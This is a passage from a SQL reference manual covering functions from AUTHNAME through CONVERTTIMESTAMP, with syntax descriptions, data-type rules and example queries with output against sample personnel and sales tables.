the authorization ID that is\r\nassociated with the specified authorization ID number.\r\n\r\n```\r\nAUTHNAME (auth-id)\r\n```\r\n\r\n* `_auth-id_`\r\n+\r\nis the 32-bit number associated with an authorization ID. See\r\n<<authorization_ids,Authorization IDs>>.\r\n\r\nThe AUTHNAME function is similar to the <<user_function,USER Function>>.\r\n\r\n[[considerations_for_authname]]\r\n=== Considerations for AUTHNAME\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_authname]]\r\n=== Examples of AUTHNAME\r\n\r\n* This example shows the authorization name associated with the\r\nauthorization ID number, 33333:\r\n+\r\n```\r\n>>SELECT AUTHNAME (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB__ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[avg_function]]\r\n== AVG Function\r\n\r\nAVG is an aggregate function that returns the average of a set of\r\nnumbers.\r\n\r\n```\r\nAVG ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe AVG of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. If you specify DISTINCT, duplicate
If you specify DISTINCT, duplicate\r\nvalues are eliminated before the AVG function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value _expression_ that determines the\r\nvalues to average. The _expression_ cannot contain an aggregate function\r\nor a subquery. The DISTINCT clause specifies that the AVG function\r\noperates on distinct values from the one-column table derived from the\r\nevaluation of _expression_.\r\n\r\nSee <<numeric_value_expressions,Numeric Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[considerations_for_avg]]\r\n=== Considerations for AVG\r\n\r\n[[data-type-of-the-result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument.\r\n\r\nThe scale of the result is the same as the scale of the argument. If the\r\nargument has no scale, the result is truncated.\r\n\r\n\r\n[[operands-of-the-expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table but\r\ncannot include an aggregate function. These expressions are valid:\r\n\r\n```\r\nAVG (SALARY)\r\nAVG (SALARY * 1.1)\r\nAVG (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[avg_nulls]]\r\n==== Nulls\r\n\r\nAll nulls are eliminated before the function is applied to the set of\r\nvalues. If the result table is empty, AVG returns NULL.\r\n\r\n[[examples_of_avg]]\r\n==== Examples of AVG\r\n\r\n* Return the average value of the SALARY column:\r\n+\r\n```\r\nSELECT AVG (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n---------------------\r\n 49441.52\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average value of the set of unique SALARY values:\r\n+\r\n```\r\nSELECT AVG(DISTINCT salary) AS Avg_Distinct_Salary FROM persnl.employee;\r\n\r\nAVG_DISTINCT_SALARY\r\n---------------------\r\n 53609.89\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average salary by department:\r\n+\r\n```\r\nSELECT deptnum, AVG (salary) AS \"AVERAGE SALARY\"\r\nFROM persnl.employee\r\nWHERE deptnum < 3000 GROUP BY deptnum;\r\n\r\nDept\/Num \"AVERAGE SALARY\"\r\n-------- ---------------------\r\n 1000 52000.17\r\n 2000 50000.10\r\n 1500 41250.00\r\n 2500 37000.00\r\n\r\n--- 4 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[bitand_function]]\r\n== BITAND Function\r\n\r\nThe BITAND function performs an AND operation on corresponding bits of\r\nthe two operands. If both bits are 1, the result bit is 1. Otherwise the\r\nresult bit is 0.\r\n\r\n```\r\nBITAND (expression, expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nThe result data type is a binary number. Depending on the precision of\r\nthe operands, the data type of the result can either be an INT (32-bit\r\ninteger) or a LARGEINT (64-bit integer).\r\n+\r\nIf the max precision of either operand is greater than 9, LARGEINT is\r\nchosen (numbers with precision greater than 9 are represented by\r\nLARGEINT). Otherwise, INT is chosen.\r\n+\r\nIf both operands are unsigned, the result is unsigned. Otherwise, the\r\nresult is signed. 
Both operands are converted to the result data type\r\nbefore performing the bit operation.\r\n\r\n[[considerations_for_bitand]]\r\n=== Considerations for BITAND\r\n\r\nBITAND can be used anywhere in an SQL query where an expression could be\r\nused. This includes SELECT lists, WHERE predicates, VALUES clauses, SET\r\nstatement, and so on.\r\n\r\nThis function returns a numeric data type and can be used in arithmetic\r\nexpressions.\r\n\r\nNumeric operands can be positive or negative numbers. All numeric data\r\ntypes are allowed with the exceptions listed in the\r\n<<restrictions_for_bitand,Restrictions for BITAND>> section.\r\n\r\n[[restrictions_for_bitand]]\r\n==== Restrictions for BITAND\r\n\r\nThe following are BITAND restrictions:\r\n\r\n* Must have two operands\r\n* Operands must be binary or decimal exact numerics\r\n* Operands must have scale of zero\r\n* Operands cannot be floating point numbers\r\n* Operands cannot be an extended precision numeric (the maximum precision of an extended numeric data type is 128)\r\n\r\n\r\n[[examples_of_bitand]]\r\n=== Examples of BITAND\r\n\r\n```\r\n>>select bitand(1,3) from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected\r\n\r\n>>select 1 & 3 from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected\r\n\r\n>>select bitand(1,3) + 0 from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected\r\n```\r\n\r\n<<<\r\n[[case_expression]]\r\n== CASE (Conditional) Expression\r\n\r\nThe CASE expression is a conditional expression with two forms: simple\r\nand searched.\r\n\r\nIn a simple CASE expression, {project-name} SQL compares a value to a\r\nsequence of values and sets the CASE expression to the value associated\r\nwith the first match — if a match exists. If no match exists, {project-name}\r\nSQL returns the value specified in the ELSE clause (which can be null).\r\n\r\nIn a searched CASE expression, {project-name} SQL evaluates a sequence of\r\nconditions and sets the CASE expression to the value associated with the\r\nfirst condition that is true — if a true condition exists. If no true\r\ncondition exists, {project-name} SQL returns the value specified in the ELSE\r\nclause (which can be null).\r\n\r\n*Simple CASE is*:\r\n\r\n```\r\nCASE case-expression\r\n WHEN expression-1 THEN {result-expression-1 | NULL}\r\n WHEN expression-2 THEN {result-expression-2 | NULL}\r\n ...\r\n WHEN expression-n THEN {result-expression-n | NULL}\r\n [ELSE {result-expression | NULL}]\r\nEND\r\n```\r\n\r\n*Searched CASE is*:\r\n\r\n```\r\nCASE\r\n WHEN _condition-1_ THEN {_result-expression-1_ | NULL}\r\n WHEN _condition-2_ THEN {_result-expression-2_ | NULL}\r\n ...\r\n WHEN _condition-n_ THEN {_result-expression-n_ | NULL}\r\n [ELSE {_result-expression_ | NULL}]\r\nEND\r\n```\r\n\r\n* `_case-expression_`\r\n+\r\nspecifies a value expression that is compared to the value expressions\r\nin each WHEN clause of a simple CASE. The data type of each _expression_\r\nin the WHEN clause must be comparable to the data type of\r\n_case-expression_.\r\n\r\n* `_expression-1_ … _expression-n_`\r\n+\r\nspecifies a value associated with each _result-expression_. If the\r\nvalue of an _expression_ in a WHEN clause matches the value of\r\n_case-expression_, simple CASE returns the associated\r\n_result-expression_ value. 
If no match exists, the CASE expression\r\nreturns the value expression specified in the ELSE clause, or NULL if\r\nthe ELSE value is not specified.\r\n\r\n* `_result-expression-1_ … _result-expression-n_`\r\n+\r\nspecifies the result value expression associated with each _expression_\r\nin a WHEN clause of a simple CASE, or with each _condition_ in a WHEN\r\nclause of a searched CASE. All of the _result-expressions_ must have\r\ncomparable data types, and at least one of the\r\n_result-expressions_ must return non-null.\r\n\r\n* `_result-expression_`\r\n+\r\nfollows the ELSE keyword and specifies the value returned if none of the\r\nexpressions in the WHEN clause of a simple CASE are equal to the case\r\nexpression, or if none of the conditions in the WHEN clause of a\r\nsearched CASE are true. If the ELSE _result-expression_ clause is not\r\nspecified, CASE returns NULL. The data type of _result-expression_ must\r\nbe comparable to the other results.\r\n\r\n* `_condition-1_ … _condition-n_`\r\n\r\nspecifies conditions to test for in a searched CASE. If a _condition_ is\r\ntrue, the CASE expression returns the associated _result-expression_\r\nvalue. If no _condition_ is true, the CASE expression returns the value\r\nexpression specified in the ELSE clause, or NULL if the ELSE value is\r\nnot specified.\r\n\r\n[[considerations_for_case]]\r\n=== Considerations for CASE\r\n\r\n[[data_type_of_the_case_expression]]\r\n==== Data Type of the CASE Expression\r\n\r\nThe data type of the result of the CASE expression depends on the data\r\ntypes of the result expressions. If the results all have the same data\r\ntype, the CASE expression adopts that data type. If the results have\r\ncomparable but not identical data types, the CASE expression adopts the\r\ndata type of the union of the result expressions. 
This result data type\r\nis determined in these ways.\r\n\r\n[[character_data_type]]\r\n==== Character Data Type\r\n\r\nIf any data type of the result expressions is variable-length character\r\nstring, the result data type is variable-length character string with\r\nmaximum length equal to the maximum length of the result expressions.\r\n\r\nOtherwise, if none of the data types is variable-length character\r\nstring, the result data type is fixed-length character string with length\r\nequal to the maximum of the lengths of the result expressions.\r\n\r\n[[numeric_data_type]]\r\n==== Numeric Data Type\r\n\r\nIf all of the data types of the result expressions are exact numeric,\r\nthe result data type is exact numeric with precision and scale equal to\r\nthe maximum of the precisions and scales of the result expressions.\r\n\r\nFor example, if _result-expression-1_ and _result-expression-2_ have\r\ndata type NUMERIC(5) and _result-expression-3_ has data type\r\nNUMERIC(8,5), the result data type is NUMERIC(10,5).\r\n\r\nIf any data type of the result expressions is approximate numeric, the\r\nresult data type is approximate numeric with precision equal to the\r\nmaximum of the precisions of the result expressions.\r\n\r\n[[datetime_data_type]]\r\n==== Datetime Data Type\r\n\r\nIf the data type of the result expressions is datetime, the result data\r\ntype is the same datetime data type.\r\n\r\n[[interval_data_type]]\r\n==== Interval Data Type\r\n\r\nIf the data type of the result expressions is interval, the result data\r\ntype is the same interval data type (either year-month or day-time) with\r\nthe start field being the most significant of the start fields of the\r\nresult expressions and the end field being the least significant of the\r\nend fields of the result expressions.\r\n\r\n[[examples_of_case]]\r\n=== Examples of CASE\r\n\r\n* Use a simple CASE to decode JOBCODE and return NULL if JOBCODE does\r\nnot match any of the listed values:\r\n+\r\n```\r\nSELECT\r\n last_name\r\n, first_name\r\n, CASE jobcode\r\n WHEN 100 THEN 'MANAGER'\r\n WHEN 200 THEN 'PRODUCTION SUPV'\r\n WHEN 250 THEN 'ASSEMBLER'\r\n WHEN 300 THEN 'SALESREP'\r\n WHEN 400 THEN 'SYSTEM ANALYST'\r\n WHEN 420 THEN 'ENGINEER'\r\n WHEN 450 THEN 'PROGRAMMER'\r\n WHEN 500 THEN 'ACCOUNTANT'\r\n WHEN 600 THEN 'ADMINISTRATOR ANALYST'\r\n WHEN 900 THEN 'SECRETARY'\r\n ELSE NULL\r\n END\r\nFROM persnl.employee;\r\n\r\nLAST_NAME FIRST_NAME (EXPR)\r\n-------------------- --------------- -----------------\r\nGREEN ROGER MANAGER\r\nHOWARD JERRY MANAGER\r\nRAYMOND JANE MANAGER\r\n...\r\nCHOU JOHN SECRETARY\r\nCONRAD MANFRED PROGRAMMER\r\nHERMAN JIM SALESREP\r\nCLARK LARRY ACCOUNTANT\r\nHALL KATHRYN SYSTEM ANALYST\r\n...\r\n\r\n--- 62 row(s) selected.\r\n```\r\n\r\n* Use a searched CASE to return LAST_NAME, FIRST_NAME and a value based\r\non SALARY that depends on the value of DEPTNUM:\r\n+\r\n```\r\nSELECT\r\n last_name\r\n, first_name\r\n, deptnum\r\n, CASE\r\n WHEN deptnum = 9000 THEN salary * 1.10\r\n WHEN deptnum = 1000 THEN salary * 1.12 ELSE salary\r\n END\r\nFROM persnl.employee;\r\n\r\nLAST_NAME FIRST_NAME DEPTNUM (EXPR)\r\n---------------- ------------ ------- -------------------\r\nGREEN ROGER 9000 193050.0000\r\nHOWARD JERRY 1000 153440.1120\r\nRAYMOND JANE 3000 136000.0000\r\n...\r\n\r\n--- 62 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[cast_expression]]\r\n== CAST Expression\r\n\r\nThe CAST expression converts data to the data type you specify.\r\n\r\n```\r\nCAST ({expression | NULL} AS data-type) \r\n```\r\n\r\n* 
`_expression_ | NULL`\r\n+\r\nspecifies the operand to convert to the data type _data-type_.\r\n+\r\nIf the operand is an _expression_, then _data-type_ depends on the\r\ndata type of _expression_ and follows the rules outlined in\r\n<<valid_conversions_for_cast,Valid Conversions for CAST >>.\r\n+\r\nIf the operand is NULL, or if the value of the _expression_ is null, the\r\nresult of CAST is NULL, regardless of the data type you specify.\r\n\r\n* `_data-type_`\r\n+\r\nspecifies a data type to associate with the operand of CAST. See\r\n<<data_types,Data Types>>.\r\n+\r\nWhen casting data to a CHAR or VARCHAR data type, the resulting data\r\nvalue is left justified. Otherwise, the resulting data value is right\r\njustified. Further, when you are casting to a CHAR or VARCHAR data type,\r\nyou must specify the length of the target value.\r\n\r\n[[considerations_for_cast]]\r\n=== Considerations for CAST\r\n\r\n* Fractional portions are discarded when you use CAST of a numeric value to an INTERVAL type.\r\n* Depending on how your file is set up, using CAST might cause poor\r\nquery performance by preventing the optimizer from choosing the most\r\nefficient plan and requiring the executor to perform a complete table or\r\nindex scan.\r\n\r\n[[valid_conversions_for_cast]]\r\n==== Valid Conversions for CAST\r\n\r\n* An exact or approximate numeric value to any other numeric data type.\r\n* An exact or approximate numeric value to any character string data type.\r\n* An exact numeric value to either a single-field year-month or day-time interval such as INTERVAL DAY(2).\r\n* A character string to any other data type, with one restriction:\r\n\r\nThe contents of the character string to be converted must be consistent\r\nin meaning with the data type of the result. For example, if you are\r\nconverting to DATE, the contents of the character string must be 10\r\ncharacters consisting of the year, a hyphen, the month, another hyphen,\r\nand the day.\r\n\r\n* A date value to a character string or to a TIMESTAMP ({project-name} SQL fills in the time part with 00:00:00.00).\r\n* A time value to a character string or to a TIMESTAMP ({project-name} SQL fills in the date part with the current date).\r\n* A timestamp value to a character string, a DATE, a TIME, or another TIMESTAMP with different fractional seconds precision.\r\n* A year-month interval value to a character string, an exact numeric,\r\nor to another year-month INTERVAL with a different start field precision.\r\n* A day-time interval value to a character string, an exact numeric, or\r\nto another day-time INTERVAL with a different start field precision.\r\n\r\n[[examples_of_cast]]\r\n=== Examples of CAST\r\n\r\n* In this example, the fractional portion is discarded:\r\n+\r\n```\r\nCAST (123.956 as INTERVAL DAY(18))\r\n```\r\n\r\n* This example returns the difference of two timestamps in minutes:\r\n+\r\n```\r\nCAST((d.step_end - d.step_start) AS INTERVAL MINUTE)\r\n```\r\n\r\n* Suppose that your database includes a log file of user information.\r\nThis example converts the current timestamp to a character string and\r\nconcatenates the result to a character literal. 
Note the length must be\r\nspecified.\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (001, 'User JBrook, executed at ' || CAST (CURRENT_TIMESTAMP AS CHAR(26)));\r\n```\r\n\r\n<<<\r\n[[ceiling_function]]\r\n== CEILING Function\r\n\r\nThe CEILING function returns the smallest integer, represented as a\r\nFLOAT data type, greater than or equal to a numeric value expression.\r\n\r\nCEILING is a {project-name} SQL extension.\r\n\r\n```\r\nCEILING (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the CEILING function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_ceiling]]\r\n=== Examples of CEILING\r\n\r\n* This function returns the integer value 3.00000000000000000E+000,\r\nrepresented as a FLOAT data type:\r\n+\r\n```\r\nCEILING (2.25)\r\n```\r\n\r\n<<<\r\n[[char_function]]\r\n=== CHAR Function\r\n\r\nThe CHAR function returns the character that has the specified code\r\nvalue, which must be of exact numeric with scale 0.\r\n\r\nCHAR is a {project-name} SQL extension.\r\n\r\n```\r\nCHAR(code-value, [,char-set-name])\r\n```\r\n\r\n* `_code-value_`\r\n+\r\nis a valid code value in the character set in use.\r\n\r\n* `_char-set-name_`\r\n+\r\ncan be ISO88591 or UTF8. The returned character will be associated with\r\nthe character set specified by _char-set-name_.\r\n+\r\nThe default for _char-set-name_ is ISO88591.\r\n\r\n[[considerations_for_char]]\r\n=== Considerations for CHAR\r\n\r\n* For the ISO88591 character set, the return type is VARCHAR(1).\r\n* For the UTF8 character set, the return type is VARCHAR(1).\r\n\r\n[[examples_of_char]]\r\n=== Examples of CHAR\r\n\r\n* Select the column CUSTNAME and return the ASCII code of the first\r\ncharacter of the customer name and its CHAR value:\r\n+\r\n```\r\nSELECT custname, ASCII (custname), CHAR (ASCII (custname))\r\nFROM sales.customer;\r\n\r\nCUSTNAME (EXPR) ( EXPR)\r\n------------------ ------- -------\r\nCENTRAL UNIVERSITY 67 C\r\nBROWN MEDICAL CO 66 B\r\nSTEVENS SUPPLY 83 S\r\nPREMIER INSURANCE 80 P\r\n... ... ...\r\n\r\n--- 15 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[char_length_function]]\r\n== CHAR_LENGTH Function\r\n\r\nThe CHAR_LENGTH function returns the number of characters in a string.\r\nYou can also use CHARACTER_LENGTH. Every character, including multi-byte\r\ncharacters, counts as one character.\r\n\r\n```\r\nCHAR[ACTER]_LENGTH (string-value-expression)\r\n```\r\n\r\n* `_string-value-expression_`\r\n+\r\nspecifies the string value expression for which to return the length in\r\ncharacters. {project-name} SQL returns the result as a two-byte signed\r\ninteger with a scale of zero. If _string-value-expression_ is null,\r\n{project-name} SQL returns a length of\r\nnull. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_char_length]]\r\n=== Considerations for CHAR_LENGTH\r\n\r\n[[char_and_varchar_operands]]\r\n==== CHAR and VARCHAR Operands\r\n\r\nFor a column declared as fixed CHAR, {project-name} SQL returns the maximum\r\nlength of that column. For a VARCHAR column, {project-name} SQL returns the\r\nactual length of the string stored in that column.\r\n\r\n[[examples_of_char_length]]\r\n=== Examples of CHAR_LENGTH\r\n\r\n\r\n* This function returns 12 as the result. 
The concatenation operator is\r\ndenoted by two vertical bars (\\|\\|).\r\n+\r\n```\r\nCHAR_LENGTH ('ROBERT' || ' ' || 'SMITH')\r\n```\r\n\r\n* The string '' is the null (or empty) string. This function returns 0\r\n(zero):\r\n+\r\n```\r\nCHAR_LENGTH ('')\r\n```\r\n\r\n* The DEPTNAME column has data type CHAR(12). Therefore, this function\r\nalways returns 12:\r\n+\r\n```\r\nCHAR_LENGTH (deptname)\r\n```\r\n\r\n* The PROJDESC column in the PROJECT table has data type VARCHAR(18).\r\nThis function returns the actual length of the column value — not 18 for\r\nshorter strings — because it is a VARCHAR value:\r\n+\r\n```\r\nSELECT CHAR_LENGTH (projdesc) FROM persnl.project;\r\n\r\n(EXPR)\r\n----------\r\n 14\r\n 13\r\n 13\r\n 17\r\n 9\r\n 9\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[coalesce_function]]\r\n== COALESCE Function\r\n\r\nThe COALESCE function returns the value of the first expression in the\r\nlist that does not have a NULL value or if all the expressions have NULL\r\nvalues, the function returns a NULL value.\r\n\r\n```\r\nCOALESCE (expr1, expr2, ...)\r\n```\r\n\r\n* `_expr1_`\r\n+\r\nan expression to be compared.\r\n\r\n* `_expr2_`\r\n+\r\nan expression to be compared.\r\n\r\n[[examples_of_coalesce]]\r\n=== Examples of COALESCE\r\n\r\n* COALESCE returns the value of the first operand that is not NULL:\r\n+\r\n```\r\nSELECT COALESCE (office_phone, cell_phone, home_phone, pager, fax_num, '411')\r\nfrom emptbl;\r\n```\r\n\r\n<<<\r\n[[code_value_function]]\r\n== CODE_VALUE Function\r\n\r\nThe CODE_VALUE function returns an unsigned integer (INTEGER UNSIGNED)\r\nthat is the code point of the first character in a character value\r\nexpression that can be associated with one of the supported character\r\nsets.\r\n\r\nCODE_VALUE is a {project-name} SQL extension.\r\n\r\n```\r\nCODE_VALUE(character-value-expression)\r\n character-set\r\n```\r\n\r\n* `_character-value-expression_`\r\n+\r\nis a character string.\r\n\r\n\r\n[[examples_of_code_value_function]]\r\n=== Examples of CODE_VALUE Function\r\n\r\n* This function returns 97 as the result:\r\n+\r\n```\r\n>>select code_value('abc') from (values(1))x;\r\n\r\n(EXPR)\r\n----------\r\n 97\r\n```\r\n\r\n<<<\r\n[[concat_function]]\r\n=== CONCAT Function\r\n\r\nThe CONCAT function returns the concatenation of two character value\r\nexpressions as a character string value. You can also use the\r\nconcatenation operator (\\|\\|).\r\n\r\nCONCAT is a {project-name} SQL extension.\r\n\r\n```\r\nCONCAT (character-expr-1, character-expr-2)\r\n```\r\n\r\n* `_character-expr-1_, _character-expr-2_`\r\n+\r\nare SQL character value expressions (of data type CHAR or VARCHAR) that\r\nspecify two strings of characters. Both character value expressions must\r\nbe either ISO8859-1 character expressions or UTF8 character expressions.\r\nThe result of the CONCAT function is the concatenation of\r\n_character-expr-1_ with _character-expr-2_. The result type is CHAR if\r\nboth expressions are of type CHAR and it is VARCHAR if either of the\r\nexpressions is of type VARCHAR.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n\r\n[[concatenation_operator]]\r\n=== Concatenation Operator (||)\r\n\r\nThe concatenation operator, denoted by two vertical bars (||),\r\nconcatenates two string values to form a new string value. 
To indicate\r\nthat two strings are concatenated, connect the strings with two vertical\r\nbars (\\|\\|):\r\n\r\n```\r\ncharacter-expr-1 || character-expr-2\r\n```\r\n\r\nAn operand can be any SQL value expression of data type CHAR or VARCHAR.\r\n\r\n[[considerations_for_concat]]\r\n=== Considerations for CONCAT\r\n\r\n[[operands]]\r\n=== Operands\r\n\r\n\r\nA string value can be specified by any character value expression, such\r\nas a character string literal, character string function, column\r\nreference, aggregate function, scalar subquery, CASE expression, or CAST\r\nexpression. The value of the operand must be of type CHAR or VARCHAR.\r\n\r\nIf you use the CAST expression, you must specify the length of CHAR or\r\nVARCHAR.\r\n\r\n\r\n[[sql-parameters]]\r\n=== SQL Parameters\r\n\r\nYou can concatenate an SQL parameter and a character value expression.\r\nThe concatenated parameter takes on the data type attributes of the\r\ncharacter value expression. Consider this example, where ?p is assigned\r\na string value of '5 March':\r\n\r\n?p || ' 2002'\r\n\r\nThe type assignment of the parameter ?p becomes CHAR(5), the same data\r\ntype as the character literal ' 2002'. Because you assigned a string\r\nvalue of more than five characters to ?p, {project-name} SQL returns a\r\ntruncation warning, and the result of the concatenation is 5 Mar 2002.\r\n\r\nTo specify the type assignment of the parameter, use the CAST expression\r\non the parameter as:\r\n\r\nCAST(?p AS CHAR(7)) || '2002'\r\n\r\nIn this example, the parameter is not truncated, and the result of the\r\nconcatenation is 5 March 2002.\r\n\r\n[[examples_of_concat]]\r\n=== Examples of CONCAT\r\n\r\n* Insert information consisting of a single character string. Use the\r\nCONCAT function to construct and insert the value:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (001, CONCAT ('Executed at ', CAST (CURRENT_TIMESTAMP AS CHAR(26))));\r\n```\r\n\r\n* Use the concatenation operator || to construct and insert the value:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (002, 'Executed at ' || CAST (CURRENT_TIMESTAMP AS CHAR(26)));\r\n```\r\n\r\n<<<\r\n[[converttohex_function]]\r\n== CONVERTTOHEX Function\r\n\r\nThe CONVERTTOHEX function converts the specified value expression to\r\nhexadecimal for display purposes.\r\n\r\nCONVERTTOHEX is a {project-name} SQL extension.\r\n\r\n```\r\nCONVERTTOHEX (expression)\r\n```\r\n\r\n_expression_\r\n\r\nis any numeric, character, datetime, or interval expression.\r\n\r\nThe primary purpose of the CONVERTTOHEX function is to eliminate any\r\ndoubt as to the exact value in a column. 
It is particularly useful for\r\ncharacter expressions where some characters may be from character sets\r\nthat are not supported by the client terminal's locale or may be control\r\ncodes or other non-displayable characters.\r\n\r\n[[considerations_for_converttohex]]\r\n=== Considerations for CONVERTTOHEX\r\n\r\nAlthough CONVERTTOHEX is usable on datetime and interval expressions,\r\nthe displayed output shows the internal value and is, consequently, not\r\nparticularly meaningful to general users and is subject to change in\r\nfuture releases.\r\n\r\nCONVERTTOHEX returns ASCII characters in ISO8859-1 encoding.\r\n\r\n<<<\r\n[[examples_of_converttohex]]\r\n=== Examples of CONVERTTOHEX\r\n\r\n* Display the contents of a smallint, integer, and largeint in\r\nhexadecimal:\r\n+\r\n```\r\nCREATE TABLE EG (S1 smallint, I1 int, L1 largeint);\r\n\r\nINSERT INTO EG VALUES( 37, 2147483647, 2305843009213693951);\r\n\r\nSELECT CONVERTTOHEX(S1), CONVERTTOHEX(I1), CONVERTTOHEX(L1) from EG;\r\n\r\n(EXPR) (EXPR) EXPR)\r\n------ -------- ----------------\r\n0025 7FFFFFFF 1FFFFFFFFFFFFFFF\r\n```\r\n\r\n* Display the contents of a CHAR(4) column, a VARCHAR(4) column, and a\r\nCHAR(4) column that uses the UTF8 character set. The varchar column does\r\nnot have a trailing space character as the fixed-length columns have:\r\n+\r\n```\r\nCREATE TABLE EG_CH (FC4 CHAR(4), VC4 VARCHAR(4), FC4U CHAR(4) CHARACTER SET UTF8);\r\n\r\nINSERT INTO EG_CH values('ABC', 'abc', _UTF8'abc');\r\n\r\nSELECT CONVERTTOHEX(FC4), CONVERTTOHEX(VC4), CONVERTTOHEX(FC4U) from EG_CH;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n-------- -------- ----------------\r\n41424320 616263 0061006200630020\r\n```\r\n\r\n* Display the internal values for a DATE column, a TIME column, a\r\nTIMESTAMP(2) column, and a TIMESTAMP(6) column:\r\n+\r\n```\r\nCREATE TABLE DT (D1 date, T1 time, TS1 timestamp(2), TS2 timestamp(6) );\r\nINSERT INTO DT values(current_date, current_time, current_timestamp, current_timestamp);\r\n\r\nSELECT CONVERTTOHEX(D1), CONVERTTOHEX(T1), CONVERTTOHEX(TS1), CONVERTTOHEX(TS2) from DT;\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR)\r\n----------- --------- ------------------------- -------------------------\r\n 07D8040F 0E201E 07D8040F0E201E00000035 07D8040F0E201E00081ABB\r\n```\r\n\r\n<<<\r\n* Display the internal values for an INTERVAL YEAR column, an INTERVAL\r\nYEAR(2) TO MONTH column, and an INTERVAL DAY TO SECOND column:\r\n+\r\n```\r\nCREATE TABLE IVT ( IV1 interval year, IV2 interval year(2) to month, IV3 interval day to second);\r\n\r\nINSERT INTO IVT values( interval '1' year, interval '3-2' year(2) to\r\nmonth, interval '31:14:59:58' day to second);\r\n\r\nSELECT CONVERTTOHEX(IV1), CONVERTTOHEX(IV2), CONVERTTOHEX(IV3) from IVT;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n------ -------- -----------------------\r\n 0001 0026 0000027C2F9CB780\r\n```\r\n\r\n<<<\r\n[[converttimestamp_function]]\r\n== CONVERTTIMESTAMP Function\r\n\r\nThe CONVERTTIMESTAMP function converts a Julian timestamp to a value\r\nwith data type TIMESTAMP.\r\n\r\nCONVERTTIMESTAMP is a {project-name} SQL extension.\r\n\r\n```\r\nCONVERTTIMESTAMP (julian-timestamp)\r\n```\r\n\r\n* `_julian-timestamp_`\r\n+\r\nis an expression that evaluates to a Julian timestamp, which is a\r\nLARGEINT value.\r\n\r\n[[considerations_for_converttimestamp]]\r\n=== Considerations for CONVERTTIMESTAMP\r\n\r\nThe _julian-timestamp_ value must be in the range from 148731\r\n63200000000 to 274927348799999999.\r\n\r\n\r\n[[relationship_to_the_juliantimestamp_function]]\r\n==== Relationship to the 
JULIANTIMESTAMP Function\r\n\r\nThe operand of CONVERTTIMESTAMP is a Julian timestamp, and the function\r\nresult is a value of data type TIMESTAMP. The operand of the\r\nCONVERTTIMESTAMP function is a value of data type TIMESTAMP, and the\r\nfunction result is a Julian timestamp. That is, the two functions have\r\nan inverse relationship to one another.\r\n\r\n[[use_of_converttimestamp]]\r\n==== Use of CONVERTTIMESTAMP\r\n\r\nYou can use the inverse relationship between the JULIANTIMESTAMP and\r\nCONVERTTIMESTAMP functions to insert Julian timestamp columns into your\r\ndatabase and display these column values in a TIMESTAMP format.\r\n\r\n<<<\r\n[[examples_of_converttimestamp]]\r\n=== Examples of CONVERTTIMESTAMP\r\n\r\n* Suppose that the EMPLOYEE table includes a column, named HIRE_DATE,\r\nwhich contains the hire date of each employee as a Julian timestamp.\r\nConvert the Julian timestamp into a TIMESTAMP value:\r\n+\r\n```\r\nSELECT CONVERTTIMESTAMP (hire_date) FROM persnl.employee;\r\n```\r\n\r\n* This example illustrates the inverse relationship between\r\nJULIANTIMESTAMP and CONVERTTIMESTAMP.\r\n+\r\n```\r\nSELECT CONVERTTIMESTAMP (JULIANTIMESTAMP (ship_timestamp)) FROM persnl.project;\r\n```\r\n+\r\nIf, for example, the value of SHIP_TIMESTAMP is 2008-04-03\r\n21:05:36.143000, the result of CONVERTTIMESTAMP(JULIANTIMESTAMP(ship_timestamp))\r\nis the same value, 2008-04-03 21:05:36.143000.\r\n\r\n<<<\r\n[[cos_function]]\r\n== COS Function\r\n\r\nThe COS function returns the cosine of a numeric value expression, where\r\nthe expression is an angle expressed in radians.\r\n\r\nCOS is a {project-name} SQL extension.\r\n\r\n```\r\nCOS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the COS function.\r\n\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_cos]]\r\n=== Examples of 